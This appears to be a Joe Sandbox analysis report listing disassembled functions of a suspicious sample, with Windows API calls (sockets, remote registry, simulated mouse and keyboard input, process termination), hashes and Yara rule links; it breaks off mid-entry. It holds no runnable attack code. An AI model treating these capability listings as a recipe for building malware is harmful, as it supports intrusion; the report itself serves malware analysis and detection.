API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 4969e88f083fbe60597fc6090283b0038e79a0928d8654f20947d14c1f1d890f
Instruction ID: 116c90e63e605d2f23528877c43f43e9e1371cfbb94b102565e81eef88ae7132
Opcode Fuzzy Hash: 4969e88f083fbe60597fc6090283b0038e79a0928d8654f20947d14c1f1d890f
Instruction Fuzzy Hash: BCF0EC72446616FBD7421F54EE49BD6BB3DFF0A342F805521F211928A0C7749571DF90

Function 003026BD Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 0030281D
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 0030283E
WSAGetLastError.WSOCK32 ref: 0030284F
htons.WSOCK32(?,?,?,?,?), ref: 00302938
inet_ntoa.WSOCK32(?), ref: 003028E9

Part of subcall function 002E433E: _strlen.LIBCMT ref: 002E4348

Part of subcall function 00303C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,002FF669), ref: 00303C9D

_strlen.LIBCMT ref: 00302992

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
String ID:
API String ID: 3203458085-0
Opcode ID: b78c92a649d3d6c89e7ce34bf90fd825996c5a910628d6a38bb286eb40ed02e9
Instruction ID: f7dcfbdd8d349e869cebd6799a578f260bbe859ba56929f8f58bd9559c8ee545
Opcode Fuzzy Hash: b78c92a649d3d6c89e7ce34bf90fd825996c5a910628d6a38bb286eb40ed02e9
Instruction Fuzzy Hash: DDB1F135605300AFD325EF24C899E2BBBE9AF88318F55854CF45A4B2E2DB31ED45CB91

Function 002B0527 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 002B042A
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002B0446
__allrem.LIBCMT ref: 002B045D
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002B047B
__allrem.LIBCMT ref: 002B0492
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002B04B0

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
Instruction ID: 599e3f7734b41daeba7f8b11ec072cd3b50e86398037ff7266c7132a2186e904
Opcode Fuzzy Hash: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
Instruction Fuzzy Hash: 93811E71A207069BE7229E69CCC5BEB73F8AF443A4F24422EF511D7681EB70DD608B50

Function 002B6571 Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,002A8649,002A8649,?,?,?,002B67C2,00000001,00000001,8BE85006), ref: 002B65CB
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,002B67C2,00000001,00000001,8BE85006,?,?,?), ref: 002B6651
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 002B674B
__freea.LIBCMT ref: 002B6758

Part of subcall function 002B3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,002A6A79,?,0000015D,?,?,?,?,002A85B0,000000FF,00000000,?,?), ref: 002B3BC5

__freea.LIBCMT ref: 002B6761
__freea.LIBCMT ref: 002B6786

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: a2fe89aeb06d6fe56260bbe32e816c61bae6e0a06846baeadfd6f2d6a84cb891
Instruction ID: 30000c9d9a19ecfd8b48bcf25b19626beb4e1609362f63628ec3dabf6382be1f
Opcode Fuzzy Hash: a2fe89aeb06d6fe56260bbe32e816c61bae6e0a06846baeadfd6f2d6a84cb891
Instruction Fuzzy Hash: AB51E472620207AFEB258E64CC89EFBB7A9EB40794F144669FC14D6140EF79DC60DA60

Function 0030C63B Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0028B329: _wcslen.LIBCMT ref: 0028B333

Part of subcall function 0030D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0030C10E,?,?), ref: 0030D415
Part of subcall function 0030D3F8: _wcslen.LIBCMT ref: 0030D451
Part of subcall function 0030D3F8: _wcslen.LIBCMT ref: 0030D4C8
Part of subcall function 0030D3F8: _wcslen.LIBCMT ref: 0030D4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0030C72A
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0030C785
RegCloseKey.ADVAPI32(00000000), ref: 0030C7CA
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0030C7F9
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0030C853
RegCloseKey.ADVAPI32(?), ref: 0030C85F

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: 5249ae7662c9667ab8dcd29a04bfecdf112ce8a8ed6c461c98b7dc55c39de613
Instruction ID: 5a180af9b6371b2f72178e8ead00942e817559bb09dfe9c486e4c2871a627616
Opcode Fuzzy Hash: 5249ae7662c9667ab8dcd29a04bfecdf112ce8a8ed6c461c98b7dc55c39de613
Instruction Fuzzy Hash: 8E81AF34119241AFC716DF24C894E6ABBE9FF88708F14859CF4594B2A2CB31ED05CF92

Function 002E009D Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 002E00A9
SysAllocString.OLEAUT32(00000000), ref: 002E0150
VariantCopy.OLEAUT32(002E0354,00000000), ref: 002E0179
VariantClear.OLEAUT32(002E0354), ref: 002E019D
VariantCopy.OLEAUT32(002E0354,00000000), ref: 002E01A1
VariantClear.OLEAUT32(?), ref: 002E01AB

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: b16963b5385dd5a549253f55c21ec3604bd13edd47b5bf5be0da9e9970ebd3f4
Instruction ID: 64465fb2b88841ee7cd0d79cdbc198756429ace2e0372235860c440dfabea304
Opcode Fuzzy Hash: b16963b5385dd5a549253f55c21ec3604bd13edd47b5bf5be0da9e9970ebd3f4
Instruction Fuzzy Hash: E3511B359B0350A6CF10AF66D8C5729B3E8EF55310F948046ED05DF196DBF08CA1CB51

Function 002F6ED3 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 002F6F21
CoInitialize.OLE32(00000000), ref: 002F707E
CoCreateInstance.OLE32(00320CC4,00000000,00000001,00320B34,?), ref: 002F7095
CoUninitialize.OLE32 ref: 002F7319

Strings

.lnk, xrefs: 002F6EFF, 002F6F69, 002F7025

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: d7ce99cdf6deeea6845bda9a842114f6da4d6bc202340ce29bdb3bcf0714fa00
Instruction ID: f635faa9d8dc44f3bbb3a9ca117d2228b907323478953d7991e5b9a15ada6e1d
Opcode Fuzzy Hash: d7ce99cdf6deeea6845bda9a842114f6da4d6bc202340ce29bdb3bcf0714fa00
Instruction Fuzzy Hash: E3D18975528205AFC304EF24C881E6BB7E8FF88748F40496DF5858B2A2DB71ED55CB92

Function 002F1196 Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 002F11B3
ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 002F11EE
EnterCriticalSection.KERNEL32(?), ref: 002F120A
LeaveCriticalSection.KERNEL32(?), ref: 002F1283
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 002F129A
InterlockedExchange.KERNEL32(?,000001F6), ref: 002F12C8

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: df10a4cb992b91d51cdd305c656e246a8c5f016b0ab3a8f0c630d26321ea6628
Instruction ID: 1883767c000cef4f6c7b9239c1dab706647f3821563bd174879c4862848017df
Opcode Fuzzy Hash: df10a4cb992b91d51cdd305c656e246a8c5f016b0ab3a8f0c630d26321ea6628
Instruction Fuzzy Hash: 0D416C71A10205EBDF059F94DCC5AAAB7B8FF05310F1080A5EE049A296DB30EE75DFA0

Function 00318C36 Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,002DFBEF,00000000,?,?,00000000,?,002C39E2,00000004,00000000,00000000), ref: 00318CA7
EnableWindow.USER32(?,00000000), ref: 00318CCD
ShowWindow.USER32(FFFFFFFF,00000000), ref: 00318D2C
ShowWindow.USER32(?,00000004), ref: 00318D40
EnableWindow.USER32(?,00000001), ref: 00318D66
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00318D8A

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 2feb3fff274c463722a8412e424ce927941bb9c500be523554810eeecc2b740d
Instruction ID: 98d9adf78c4b933c3595968f62a70db928c1007295dcfd06fafe208779059402
Opcode Fuzzy Hash: 2feb3fff274c463722a8412e424ce927941bb9c500be523554810eeecc2b740d
Instruction Fuzzy Hash: BE418470601344AFDB2BDF24D885BE6BBF5FB4E305F1541A9E5084B2B2CB316895CB94

Function 00302D37 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 00302D45

Part of subcall function 002FEF33: GetWindowRect.USER32(?,?), ref: 002FEF4B

GetDesktopWindow.USER32 ref: 00302D6F
GetWindowRect.USER32(00000000), ref: 00302D76
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00302DB2
GetCursorPos.USER32(?), ref: 00302DDE
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00302E3C

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: c70884863cedec8c6fa89d07bea614143974817834a258617af8623685ca46bb
Instruction ID: 082c6e4f055a4d1faec0693be61926e06931b550118c726e7f6c48154741aa97
Opcode Fuzzy Hash: c70884863cedec8c6fa89d07bea614143974817834a258617af8623685ca46bb
Instruction Fuzzy Hash: 6B31FE72506316AFC721DF14C849B9BB7ADFB89314F00091AF99997191DB30E908CB92

Function 002E55E1 Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 002E55F9
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 002E5616
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 002E564E
_wcslen.LIBCMT ref: 002E566C
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 002E5674
_wcsstr.LIBVCRUNTIME ref: 002E567E

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: 5c536fcc5b60b9d5e557faec985c194459cedaea18fc137bbe4f56130797f1f7
Instruction ID: d1fd8575f1213b865197eeb12c67791778bf3c75372ded97a20de099535dae0f
Opcode Fuzzy Hash: 5c536fcc5b60b9d5e557faec985c194459cedaea18fc137bbe4f56130797f1f7
Instruction Fuzzy Hash: 50216B312346507BEB165F36DC49EBB7BACDF4A710F808029F809CA091EFA0CC508A60

Function 002F6263 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

Part of subcall function 00285851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002855D1,?,?,002C4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00285871

_wcslen.LIBCMT ref: 002F62C0
CoInitialize.OLE32(00000000), ref: 002F63DA
CoCreateInstance.OLE32(00320CC4,00000000,00000001,00320B34,?), ref: 002F63F3
CoUninitialize.OLE32 ref: 002F6411

Strings

.lnk, xrefs: 002F62BB, 002F6306, 002F63CA

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: b3cc3a5da537432df04135e072ba2fcfe35cdaa4c0e3263c491087c5b81a4fc1
Instruction ID: e7e2dcdbc02c9c77ba92ba8c9603a14e62621264cce634dc588beb98a90a41d0
Opcode Fuzzy Hash: b3cc3a5da537432df04135e072ba2fcfe35cdaa4c0e3263c491087c5b81a4fc1
Instruction Fuzzy Hash: 3ED15574A242159FC714EF24C48892ABBE6FF89754F1088ACF9859B361CB31EC55CF92

Function 002A36F2 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,002A36E9,002A3355), ref: 002A3700
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 002A370E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 002A3727
SetLastError.KERNEL32(00000000,?,002A36E9,002A3355), ref: 002A3779

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: d413202252fa11abdd784095c86d1a9eb096683e4b27e1e77141fb340ebcd7a7
Instruction ID: b087646ab5dbcdaa0da2ecbbd3ed75b8516fc26700434fcf1ba54959a899477a
Opcode Fuzzy Hash: d413202252fa11abdd784095c86d1a9eb096683e4b27e1e77141fb340ebcd7a7
Instruction Fuzzy Hash: E401FCBB67D3226FA625ABB4BCC6567AA98EB07771F30032AF110450F1EF515D215940

Function 002B30E7 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,002A4D53,00000000,?,?,002A68E2,?,?,00000000), ref: 002B30EB
_free.LIBCMT ref: 002B311E
_free.LIBCMT ref: 002B3146
SetLastError.KERNEL32(00000000,?,00000000), ref: 002B3153
SetLastError.KERNEL32(00000000,?,00000000), ref: 002B315F
_abort.LIBCMT ref: 002B3165

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 5a3251176924e81cab7c00e228d60a0c5e62c26349f6ef45bbe519c9cc0ed6ea
Instruction ID: 13a80888d594f937f2bb6ea6dabc7d87e8d71fcbb7aef9d331cd0dcdc5758bf1
Opcode Fuzzy Hash: 5a3251176924e81cab7c00e228d60a0c5e62c26349f6ef45bbe519c9cc0ed6ea
Instruction Fuzzy Hash: 55F02D3A63060176C223FB3CAC06EEE166DAFC57F1F214414F928D21D2EE208D264961

Function 00319480 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00281F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00281F87
Part of subcall function 00281F2D: SelectObject.GDI32(?,00000000), ref: 00281F96
Part of subcall function 00281F2D: BeginPath.GDI32(?), ref: 00281FAD
Part of subcall function 00281F2D: SelectObject.GDI32(?,00000000), ref: 00281FD6

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 003194AA
LineTo.GDI32(?,00000003,00000000), ref: 003194BE
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 003194CC
LineTo.GDI32(?,00000000,00000003), ref: 003194DC
EndPath.GDI32(?), ref: 003194EC
StrokePath.GDI32(?), ref: 003194FC

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 7c1dfd6f4e70547a85a532821ed6e32bd9a12696a04098377c64d92dbb30e6e8
Instruction ID: cc213d657bd9a7c95064cb050059c7def7c22d127844e3f79b44ccf3fa87314c
Opcode Fuzzy Hash: 7c1dfd6f4e70547a85a532821ed6e32bd9a12696a04098377c64d92dbb30e6e8
Instruction Fuzzy Hash: C4111B7600010DBFDF029F90DC88EEA7F6DEB0D360F04C021BA195A1A1C7719D65DBA0

Function 0028327E Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 002832AF
MapVirtualKeyW.USER32(00000010,00000000), ref: 002832B7
MapVirtualKeyW.USER32(000000A0,00000000), ref: 002832C2
MapVirtualKeyW.USER32(000000A1,00000000), ref: 002832CD
MapVirtualKeyW.USER32(00000011,00000000), ref: 002832D5
MapVirtualKeyW.USER32(00000012,00000000), ref: 002832DD

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 55f16391c6d3d0efb360c1c5f08f689d4d3e3d55ece5ec255d6f765e1d658a27
Instruction ID: 819517df7b6332a21bdbfeb105ab2a459bbdf1ae9a4962bc9a86b3054542bbbf
Opcode Fuzzy Hash: 55f16391c6d3d0efb360c1c5f08f689d4d3e3d55ece5ec255d6f765e1d658a27
Instruction Fuzzy Hash: 3F0167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C4BA42C7F5A864CBE5

Function 002EF437 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 002EF447
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 002EF45D
GetWindowThreadProcessId.USER32(?,?), ref: 002EF46C
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002EF47B
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002EF485
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002EF48C

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
